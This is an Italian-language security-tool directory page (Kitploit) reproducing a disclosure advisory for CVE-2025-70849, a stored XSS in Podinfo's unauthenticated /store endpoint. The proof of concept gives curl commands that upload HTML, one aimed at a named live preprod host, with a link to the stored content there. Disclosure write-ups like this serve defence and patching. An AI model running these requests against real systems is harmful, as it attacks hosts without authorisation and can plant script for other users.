Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-70849 — CVE-2025-70849: XSS memorizzato in Podinfo | Kitploit
Strumenti/GitHubGitHub/deaprojects/cve-2025-70849
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e Formazione
GitHubdeaprojects/cve-2025-70849

CVE-2025-70849

CVE-2025-70849: XSS memorizzato in Podinfo

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-70849: XSS Memorizzato in Podinfo

Riepilogo

Una vulnerabilità di sicurezza (CWE-79) è stata identificata in Podinfo, un'applicazione web per dimostrare microservizi Kubernetes. La funzionalità /store consente a utenti non autenticati di caricare contenuti HTML/JS arbitrari, portando a XSS Memorizzato.

Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-70849
  • Prodotto: Podinfo
  • Endpoint Affetto: /store
  • Tipo di Vulnerabilità: Cross-Site Scripting Memorizzato (XSS)
  • Versioni Affette: <= 6.10.0

Proof of Concept (PoC)

  1. Invia il payload malevolo:
    root@kitploit:~
    curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
    esempio con target live:
    root@kitploit:~
    curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
image
  1. Accedi all'hash restituito: https:///store/

    esempio: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

    image

Cronologia

  • Scoperta: Sep 2025
  • Fornitore Notificato: 25 OCT 2025
  • Risposta del Fornitore: Riconosciuto; dichiarato nessuna tempistica attuale per la correzione.
  • Divulgazione Pubblica: February 2026

Disclaimer Questa ricerca è solo a scopo educativo.

RINGRAZIAMENTI A :

Kazi Sabbir |

Severità: Media 6.4

Scarica lo strumento